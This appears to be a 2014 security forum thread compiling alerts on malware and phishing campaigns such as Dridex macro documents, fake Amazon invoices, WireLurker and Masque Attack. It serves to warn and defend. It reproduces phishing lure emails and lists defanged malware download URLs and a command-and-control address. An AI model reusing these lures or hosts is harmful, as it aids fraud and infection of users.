Analysis: Since approximately Sep 8, 2014, this new version of the Backoff PoS malware has been classified in the ASERT malware analysis infrastructure, which contains at least three hundred distinct instances of Backoff... Easily compromised systems proliferate, and weak remote access deployments are often the culprit. Among the more difficult to compromise systems, tactics such as spear phishing, vendor compromise, partner attacks featuring lateral movement and other strategies well-known to more dedicated threat actors are bearing fruit for the attackers. Proper isolation, hardening, and monitoring of PoS deployments and associated infrastructure are crucial to reducing risks and detecting attackers that may already be present. PoS is squarely in the sights of many threat actors which means that organizations running PoS and their support infrastructure must realize that they are a target...
Source: http://www.net-security.org/malware_news.php?id=2906
___
Banking Trojan DRIDEX uses Macros for Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Nov 5, 2013 - "... DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.
Sample spammed message
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex1.png
The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled — which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware:
Malicious attachment instructing users to enable the macro feature:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex2.png
It then performs information theft through methods like form grabbing, screenshots, and site injections... Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature. The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into click the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature...
Top affected countries, based on data from September-October 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex4.jpg
We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.
Top DRIDEX spam sending countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex5.jpg
... best to make sure to enable the macro security features* in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings..."
* https://office.microsoft.com/en-us/visio-help/about-macro-security-levels-HP001049689.aspx
___
'Free' Netflix Accounts: Good Luck With That...
- https://blog.malwarebytes.org/fraud-scam/2014/11/sites-offering-free-netflix-accounts-good-luck-with-that/
Nov 5, 2014 - "We’ve seen a number of Netflix themed websites which claim to offer up accounts / logins for fans of TV and movie streaming to get their fix -without- having to register or -pay- up to use the service...
1) freenetflixaccount(dot)info
This one is rather cookie-cutter and claims to have lots of accounts up for grab, linking to numerous “Netflix premium account” URLs further down the page.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx1.jpg?w=564
However, all of the live links lead to the same survey page:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx4.jpg
To get your hands on the supposed account credentials, you’d have to fill in an offer or sign up to whatever happens to be presented to you. Am I sensing an incoming theme here?…
2) freenetflixaccountasap(dot)com
This website has the visitor play an extremely long-winded and elaborate game of “click the thing”, distracting them with lots of options to choose from in order to watch some movies.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx5.jpg
... According to the text underneath the many scrolling blue bars, they claim to log you into an account from your chosen region via proxy, set up a bunch of options then log you out. They then “upload the account details” to Fileice, and ask the visitor to “Click below to download the login details”.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx12.jpg
... > https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx13.jpg
... Interesting to note that the “newly created” page has an entry on VirusTotal* from just over a week ago... Always be wary when presented with supposedly free accounts – remember that there’s something in it for the person offering them up, and it could be anything from survey scam affiliate cash and fakeouts to phishing and Malware attacks..."
* https://www.virustotal.com/en/url/d7d219b5549e7159b0722596750bcdbe6345eb39af17d24105735a03fd345e95/analysis/
___
E-ZPass SPAM/Phish ...
- http://www.networkworld.com/article/2842773/security0/have-e-zpass-watch-out-for-slimy-asprox-based-malware-ploy.html
Nov 3, 2014 - "The Internet Crime Complaint Center* today said it has gotten more than 560 complaints about a rip-off using the E-ZPass vehicle toll collection system that uses phishing techniques to deliver malware to your computer. E-ZPass is an association of 26 toll agencies in 15 states that operate the E-ZPass toll collection program..."
* https://www.ic3.gov/media/2014/141103.aspx
"... The IC3 has received more than 560 complaints in which a victim receives an e-mail stating they have not paid their toll bill. The e-mail gives instructions to download the invoice by using the link provided, but the -link- is actually a .zip file that contains an executable with location aware malware. Some of the command and control server locations are associated with the ASProx botnet..."
- http://stopmalvertising.com/spam-scams/e-zpass-themed-emails-lead-to-asprox.html
9 July 2014
Screenshot: http://stopmalvertising.com/research/images/ezpass-asprox.jpg
___
20 million new strains of malware - Q3 2014
- http://www.pandasecurity.com/mediacenter/malware/over-20-million-new-strains-of-malware-were-indentified-in-q3-2014/
Oct 31, 2014 - "... some 20 million new strains were created worldwide in the third quarter of the year, at a rate of 227,747 new samples every day. Similarly, the global infection ratio was 37.93%, slightly up on the previous quarter (36.87%)... Trojans are still the most common type of malware (78.08%). A long way behind in second place come viruses (8.89), followed by worms (3.92%)... Trojans also accounted for most infections during this period, some 75% of the total, compared with 62.80% in the previous quarter. PUPs are still in second place, responsible for 14.55% of all infections, which is down on the second quarter figure of 24.77. These are followed by adware/spyware (6.88%), worms (2.09%), and viruses (1.48)..."
:mad: :fear:
AplusWebMaster
2014-11-06, 14:20
FYI...
Fake Amazon SPAM - Word doc malware
- http://blog.mxlab.eu/2014/11/06/w97mdownloader-t-threat-attached-as-word-file-to-fake-emails-from-amazon-regarding-dispatched-order/
Nov 6, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Amazon .co.uk order has dispatched (#203-2083868-0173124)”. This email is sent from the spoofed address “Amazon .co.uk” <auto-shipping@ amazon .co.uk>” and has the following body:
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http ://www.amazon .co.uk/your-account
Your order #203-2083868-0173124 (received November 5, 2014)
Your right to cancel:
At Amazon .co.uk we want you to be delighted every time you shop with us. O=
ccasionally though, we know you may want to return items. Read more about o=
ur Returns Policy at: http ://www.amazon .co.uk/returns-policy/
Further, under the United Kingdom’s Distance Selling Regulations, you have =
the right to cancel the contract for the purchase of any of these items wit=
hin a period of 7 working days... If you’ve explored the above links but still need to get in touch with us, = you will find more contact details at the online Help Desk.=20
Note: this e-mail was sent from a notification-only e-mail address that can= not accept incoming e-mail.
Please do not reply to this message.=20
Thank you for shopping at Amazon .co.uk
The attached file has the name Mail Attachment.doc and is approx. 230 kB large file. The malicious Word file is detected as W97M/Downloader.t, W97M.DownLoader.110 or W97M.Dropper.Obfus. At the time of writing, 4 of the 54 AV engines did detect the malicious file at Virus Total*..."
* https://www.virustotal.com/en/file/99077f53365f931bddb4028793f9722c25b7095ae61eae3f6b31f9d7225e8c27/analysis/1415272790/
- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
- https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/
___
Fake 'Order' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/successfull_order-032574522-word-doc-malware/
6 Nov 2014 - "An email saying 'This is a notice that the invoice has been generated on 05.11.2014' pretending to come from random names at random companies with a subject of 'Successfull_Order 032574522' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear Customer, [redacted]
This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 468824369.
Your credit card will be charged for 47.40 USD.
The payment and delivery information is in attached file.
Regards,
Systems Company,
Crocitto Greta
6 November 2014 : Order561104111.doc - Current Virus total detections: 6/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... embedded malware or macro..."
* https://www.virustotal.com/en/file/d16c465aade28e04c2b5d9488f8698affccd7e7dc0bf36b3ecfa996d33bcd7f6/analysis/1415152827/
___
Fake Bank SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-banque-royale-bank-interac-guillaume-gilnaught-fake-pdf-malware/
6 Nov 2014 - "'The Bank INTERAC to Guillaume Gilnaught was accepted' pretending to come from RBC Banque Royale < ibanking@ rbc .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/The-Bank-INTERAC-to-Guillaume-Gilnaught-was-accepted.png
6 November 2014: INTERAC_pmt_11062014_0345875.zip: Extracts to: INTERAC_pmt_11062014_0345875.exe
Current Virus total detections: 5/53* . This 'The Bank INTERAC to Guillaume Gilnaught was accepted" is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cf7454645f1116d370dcc1ea979bb31866600c15880f69920ba65cdf941d6ffe/analysis/1415290279/
___
Western Union Payment Confirmation Spam
- http://threattrack.tumblr.com/post/101929253328/western-union-payment-confirmation-spam
Nov 6, 2014 - "Subjects Seen:
WUBS Outgoing Payment Confirmation for SOTR4465838
Typical e-mail details:
... This is an automatically generated response: please do not reply to this e-mail. For enquiries please contact Customer Service.
Attached you will find the Outgoing Payment Confirmation for SOTR4465838. Please confirm all details are correct and notify us immediately if there are any discrepancies.
Thank you for your business!
Malicious File Name and MD5:
9574536_11062014.zip (5ED4C6DE460B2869088C523606415B4B)
9574536_11062014.exe (C8A8F049313D1C67F1BAAF338FE5EDE0)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a0c7619e79b0504fac6a4441b0bdf838/tumblr_inline_nemiq798aI1r6pupn.png
Tagged: Western Union, Upatre
___
Apple blocks apps infected with WireLurker malware targeting iPhones and iPads
- http://www.theinquirer.net/inquirer/news/2379822/wirelurker-malware-targeting-iphones-and-ipads-via-mac-os-x
Nov 6, 2014 - "... Palo Alto Networks* discovered the malware threat that targets iPhones and iPads through Apple's Mac OS X operating system, putting an end to the age-old belief that iOS is virus-free. Apple has since responded, and said it has -blocked- third-party apps infected with the malware, which Palo Alto describes as the "biggest in scale" it has ever seen... "As always, we recommend that users download and install software from trusted sources.” Palo Alto discovered the new family of malware dubbed 'WireLurker', which is the first known malware that can attack iOS applications in a similar way to a traditional virus. Palo Alto describes the threat as heralding "a new era in malware attacking Apple's desktop and mobile platforms", and said that the malware is "the biggest in scale we have ever seen". WireLurker can attack iOS devices through Mac OS X using USB, and does so by installing third-party applications on non-jailbroken iPhones through 'enterprise provisioning'. The malware seems to be limited to China at present, where it is targeting devices via the Maiyadi App Store, a third-party Mac app store. WireLurker has been found in -467- OS X apps at Maiyadi, which Palo Alto claims have been downloaded 356,104 times so far... The firm also said that enterprises using Mac computers should ensure that mobile device traffic is routed through a threat prevention system."
* http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
___
Hacks devise new simplified Phishing
- http://www.darkreading.com/attacks-breaches/hackers-devise-new-simplified-phishing-method/d/d-id/1317242
Nov 5, 2014 - "... a more efficient way to get unwary online shoppers to part with their personal data and financial account information. The new technique, dubbed 'Operation Huyao' by the security researchers at Trend Micro* who discovered it, basically lessens the time and effort needed for attackers to mount a phishing campaign while also making such attacks harder to spot... only when the user actually attempts to make a purchase that the proxy program serves up a modified page that walks the victim through a checkout progress designed to extract personal information and payment card or bank account information... the phishers employed various blackhat SEO techniques to ensure that people doing specific product-related searches online were served up with results containing malicious links to the targeted store. Users who clicked on the links were then routed to the department store's website via the malicious proxy... In the first half of 2014 for instance, the median uptime for phishing attacks was 8 hours and 42 minutes, meaning that half of all phishing attackers were active for less than nine, the APWG** has noted... Even so, phishing continues to be a major problem. In the first six months of 2014, the industry group counted more than 123,700 unique phishing attacks which was the highest since the second half of 2009. A total of -756- institutions were specifically targeted in these attacks, the largest number ever during a six-month period. Of these companies -Apple- was the most phished brand."
* http://blog.trendmicro.com/trendlabs-security-intelligence/new-phishing-technique-outfoxes-site-owners-operation-huyao/
** http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___
CVE-2014-1772 – IE vuln analysis
- http://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/
Nov 5, 2014 - "... privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035*... this vulnerability was already patched some time ago... This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better..."
* https://technet.microsoft.com/en-us/library/security/ms14-035.aspx - Critical
Updated: Jun 17, 2014
V1.1 (June 17, 2014): Corrected the severity table and vulnerability information to add CVE-2014-2782 as a vulnerability addressed by this update. This is an informational change only. Customers who have already successfully installed the update do not need to take any action.
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1772 - 9.3 (HIGH)
Last revised: 06/26/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2782 - 9.3 (HIGH)
Last revised: 06/26/2014
:mad: :fear:
AplusWebMaster
2014-11-07, 15:10
FYI...
'Dark market' websites seized in U.S., European busts - Silk Road 2.0
- http://www.reuters.com/article/2014/11/07/us-europol-cybersecurity-arrests-idUSKBN0IR0Z120141107
Nov 7, 2014
> http://s4.reutersmedia.net/resources/r/?m=02&d=20141107&t=2&i=989590213&w=580&fh=&fw=&ll=&pl=&r=LYNXMPEAA60EZ
"U.S. and European authorities on Friday announced the seizure of more than 400 secret website addresses and arrests of 16 people in a sweep targeting black markets for drugs and other illegal services. The developments were announced a day after prosecutors in New York unveiled criminal charges against the alleged operator of underground online drug marketplace Silk Road 2.0. U.S. authorities called the global sweep the largest law enforcement action to date against illegal websites operating on the so-called Tor network, which lets users communicate anonymously by masking their IP addresses... Europol, in a statement, said U.S. and European cyber crime units, in a sweep across 18 countries, had netted $1 million worth of Bitcoin, the digital currency, 180,000 euros in cash, silver, gold and narcotics. The more than 400 websites and domains seized on Thursday existed on the Tor network and were used by dozens of online marketplaces where such things as child pornography, guns and murder-for-hire could be purchased, authorities said. Sixteen people operating illegal sites were arrested in addition to the defendant in the Silk Road 2.0 case, Europol added, without specifying the charges... On Thursday, U.S. authorities said they had shut down Silk Road 2.0, a successor website to underground online drugs marketplace Silk Road. Blake Benthall, the alleged operator of Silk Road 2.0, was arrested and charged with -conspiracy- to commit drug trafficking, computer hacking, money laundering and other crimes. Troels Oerting, head of Europol's cybercrime center, said the operation knocked out a significant part of the infrastructure for illegal online drugs and weapons trade in the countries involved... The websites had complete business models, Oerting said, and displayed what they sold, including drugs, weapons, stolen credit cards..."
- http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
___
Fake invoice SPAM - malicious Word macro attachment
- http://blog.dynamoo.com/2014/11/sue-morckage-this-email-contains.html
7 Nov 2014 - "This -fake- invoice spam (all pretending to be from someone called Sue Morckage) comes with a malicious Word macro attachment.
From: Sue Morckage
Date: 7 November 2014 13:10
Subject: inovice 9232088 November
This email contains an invoice file attachment
The number in the subject is random, and attached is a document with the same format name (in this example invoice_9232088.doc). So far I have seen two attachments both with VT detection rates of 4/54 [1] [2]... which contains one of two malicious macros... which then go and download a binary from one of the following locations:
http ://ksiadzrobak .cba .pl/bin.exe > https://www.virustotal.com/en/ip-address/95.211.144.89/information/
http ://heartgate .de/bin.exe > https://www.virustotal.com/en/ip-address/81.169.145.156/information/
This binary gets copied into %TEMP%\AKETVJIJPZE.exe and it has a VirusTotal detection rate of just 1/54*, but so far automated analysis tools... are inconclusive as to what this does, however the payload is likely to be Cridex."
* https://www.virustotal.com/en/file/e479a2b6ef7098403c8e45d0d88be37856bb2301347f989a1708055d94c2227e/analysis/1415369050/
1] https://www.virustotal.com/en/file/7ce09f9a865bc889dd4737c1b3f5073d4512767d68604ea5913b59387f293844/analysis/1415365398/
2] https://www.virustotal.com/en/file/0db27aefbfae00b2658a360ec12445aabf0993fac6750b9c99b12e98bc3ebe4b/analysis/1415368736/
- http://myonlinesecurity.co.uk/sue-morckage-inovice-0394508-november-word-doc-malware/
7 Nov 2014
> https://www.virustotal.com/en/file/6ab64b9e14c7d8ad31794f36153276d8f50310e39e04a82935a573b8a0a982f1/analysis/1415372037/
___
Fake job sites ...
- http://blog.dynamoo.com/2014/11/europejobdayscom-and-other-fake-job.html
7 Nov 2014 - "This tip* from @peterkruse about a spam run pushing -fake- jobs using the domain europejobdays .com caught my eye, especially the mention of the nameservers using the stemcellcounseling.net domain. These -fake- job sites tend not to go alone, and a look a the other domains using the same namesevers comes up with a whole list of related -fake- sites... avoid**. You should be aware that the jobs on offer are actually part of some criminal enterprise such as money laundering or parcel reshipping. You can see a video that explains the parcel reshipping scam and the role of the parcel mule below:
> https://www.youtube.com/watch?v=UbSCXqL1jL4
* https://twitter.com/peterkruse/status/530628073264517120
** (Long list at the dynamoo URL at the top.)
___
Fake Tech Support website infections ...
- https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/
Nov 6, 2014 - "... Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or here in the U.S. This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being 'ahead of time technology equipment' while 'your computer issues are fixed securely'. This couldn’t be further from the truth. For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies... While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/blocked-1024x817.png
... One of the html files (a banner) contains a malicious script loading a page from a compromised website. This site contains an -iframe- with a dynamic URL that silently -redirects- the user to the Angler Exploit Kit... In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware... This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected... Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/eventviewer-1024x728.png
... here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely -bogus- . It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it. Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive... There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine. Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is -not- entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you. For more information on tech support scams and general advice, please check out our Tech Support -Scams- resource page*."
* https://blog.malwarebytes.org/tech-support-scams/
- http://www.symantec.com/connect/blogs/when-tech-support-scams-meet-ransomlock
7 Nov 2014 - "A technical-support phone scam uses Trojan.Ransomlock.AM to lock the user’s computer and trick them into calling a technical help phone number to resolve the issue...
Top ten ransomware detections as of 11-07-14:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%202.png
Fake BSoD lock screen:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%203%20edit.png ..."
- http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam
:mad: :fear:
AplusWebMaster
2014-11-10, 13:08
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/kate-williams-invoice-6330089-november-word-doc-malware/
10 Nov 2014 - "'invoice 6330089 November' pretending to come from 'Kate Williams' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... Almost all of these malicious word documents appear to be -blank- when opened in protected view mode... The email looks like:
Please find attached your November invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 6330089 Account No 5606330089.
Thanks very much
Kate Williams
10 November 2014 : invoice_6330089.doc - Current Virus total detections: 0/51*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415612495/
- http://blog.dynamoo.com/2014/11/kate-williams-invoice-8798556-november.html
10 Nov 2014 - "... the malware connecting to 84.40.9.34 (Hostway, UK)..."
1] https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415613432/
2] https://www.virustotal.com/en/file/626f380c54d2dde9ea3ae4b77d79a8a2e7ca7af118d726e8ba4c5edaf4d34462/analysis/1415613431/
84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
___
Fake Amazon SPAM - malware-macros
- http://net-security.org/malware_news.php?id=2912
Nov 10, 2014 - "... According to AppRiver* researchers, two distinct malware delivery campaigns impersonating e-commerce giant Amazon are currently hitting inboxes. The first one is directed at UK users, and the company has already quarantined over 600,000 of these messages. The malicious email takes the form of a 'delivery confirmation message' and carries a Word document that supposedly contains the needed information. Unfortunately for those who open the file and have -macros- enabled in Word, the action triggers the installation of a Trojan dropper that downloads additional malware aimed at harvesting login credentials for various online services, including online banking. The second campaign comes in the form of an order confirmation from Amazon .com:
> http://www.net-security.org/images/articles/amazonphish-10112014-big.jpg
... AppRiver* pointed out. Also, this campaign is less intense than the first one - the company has blocked "only" about -160,000- messages so far. The supposed 'invoice file attached' is actually a Trojan dropper that will download additional malware once the host is infected..."
* http://blog.appriver.com/2014/11/malicious-amazon-emails-aim-to-infect-holiday-shoppers
"... This is a very popular time of the year for these types of scams with so many people in shopping mode in preparation for the holidays. With many people expecting purchase confirmations and shipping confirmations with much more frequency, it increases the likelihood that people will far for this scam. Be extra cautious this holiday shopping season and if you are suspicious of unauthorized activity on your Amazon account -never- follow the link in an email such as this, go directly to the website and check your account from there."
___
'Darkhotel malware' is targeting travelling execs via hotel WiFi
- http://www.theinquirer.net/inquirer/news/2380394/darkhotel-malware-is-targeting-travelling-execs-via-hotel-wifi
Nov 10, 2014 - "... 'Darkhotel' has been targeting travelling executives via hotel WiFi for the past four years, Kaspersky has warned, and is still active today. According to the security firm, 'Darkhotel' infects hotel networks with spying software which in turn infects the computers of targeted executives as soon as they connect to the hotel WiFi network. The executives are tricked into installing the information-stealing malware by disguising it as an update for legitimate software such as Adobe Flash, Google Toolbar or Windows Messenger. The malware then searches the computer for sensitive corporate data, cached passwords and log-in credentials..."
* https://securelist.com/blog/research/66779/the-darkhotel-apt/
Nov 10, 2014
___
Home Depot drops Windows for Mac ...
- http://www.theinquirer.net/inquirer/news/2380340/home-depot-drops-windows-for-mac-os-x-after-data-hack
Nov 10 2014 - "... Home Depot is reportedly shutting out the Windows operating system in favour of the Apple alternative as the firm continues to respond to the catastrophic breach on its systems. The hardware chain has confessed in some detail about the attack on its checkout and sales systems, and admitted to losses of data that affect tens of millions of customers... The Wall Street Journal* has more information on the Home Depot hack..."
* http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282
"... hackers got into its systems last April by stealing a password from a vendor, opening a tiny hole that grew into the biggest retail-credit-card breach on record. On Thursday, the company announced the breach was worse than earlier thought. In addition to the 56 million credit-card accounts that were compromised, Home Depot now says around 53 million customer email addresses were stolen as well..."
___
'All Your iOS Apps Belong to Us' - FireEye
- http://www.fireeye.com/blog/technical/cyber-exploits/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Nov 10, 2014 - "In July 2014, FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here:
> https://www.youtube.com/watch?feature=player_embedded&v=3VEQ-bJUhPw
We have notified Apple about this vulnerability on July 26... After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can -replace- authentic apps,such as banking and email apps, using attacker's malware through the Internet. That means the attacker can steal user's banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app's local data, which -wasn't- removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user's account directly. We have seen proofs that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves... By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from app store. Masque Attack has severe security consequences... In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/Untitled1.jpg
... Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
-- Mitigations: iOS users can protect themselves from Masque Attacks by following three steps:
- Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization.
- Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately..."
Figure 3:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/IMG_0001.jpg
:mad: :fear:
AplusWebMaster
2014-11-11, 14:32
FYI...
Fake 'Bank Payment' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/11/nazarethcarecom-accounts-finchley-bank.html
11 Nov 2014 - "This -fake- invoice spam pretending to be from a care home in the UK comes with a malicious attachment.
From: Accounts Finchley [accounts.finchley@ nazarethcare .com]
Date: 11 November 2014 10:34
Subject: Bank Payments
Good Afternoon,
Paying in sheet attached
Regards
Sandra Whitmore
Care Home Administrator
Nazareth House
162 East End Road
East Finchley
London...
Nazareth Care Charitable Trust...
... The "from" field in an email is trivially easy to fake, as it looks like the body text may have been stolen from a compromised mailbox. Attached is a file 2014_11_07_14_09_19.doc which comes in two versions both with low VirusTotal detection rates [1] [2]. If macros are enabled then one of two macros... which then downloads a file from one of the following locations:
http ://www.grafichepilia .it/js/bin.exe
http ://dhanophan .co.th/js/bin.exe
This file gets copied to %TEMP%\HZLAFFLTDDO.exe and it has a VirusTotal detection rate of 3/53*. The Malwr report shows it phoning home to:
http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/
It also drops a DLL identified by VirusTotal** as Dridex."
1] https://www.virustotal.com/en/file/ba33302cdcb892cbc57b502c88775528aefed879d7515d468faea193436e46e9/analysis/1415703941/
2] https://www.virustotal.com/en/file/0a5f29b5ec667d27d1539521514dfb079b58449065df9aefc654fb16f1b83e1d/analysis/1415703952/
* https://www.virustotal.com/en/file/4c6dc38c88226dc461faaa7583ac4e53df822c919de7033428478f803f6d9ea8/analysis/1415704632/
** https://www.virustotal.com/en/file/110f884be52e0ef66f339fa122161f8e4fa66f7cd1f4a412d6ed0cd124d3f915/analysis/1415705610/
- http://myonlinesecurity.co.uk/bank-payments-pretending-come-accounts-finchley-word-doc-malware/
11 Nov 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Accounts-Finchley.png
___
Fake 'Duplicate Payment' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duplicate-payment-received-word-doc-malware/
11 Nov 2014 - "'Duplicate Payment Received' pretending to come from various random names with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £660.94 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Lenora Dunn
Accounts Department
11 November 2014 : De_VY955279R.doc - Current Virus total detections: 2/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
